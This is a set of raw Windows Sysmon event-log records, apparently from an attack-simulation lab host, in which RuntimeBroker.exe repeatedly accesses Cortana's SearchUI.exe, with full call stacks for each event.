12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006979Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006978Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006977Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006976Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006975Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006974Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006973Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006972Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006971Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006970Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006969Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006968Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006967Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006966Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006965Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006964Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006963Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006962Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006961Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
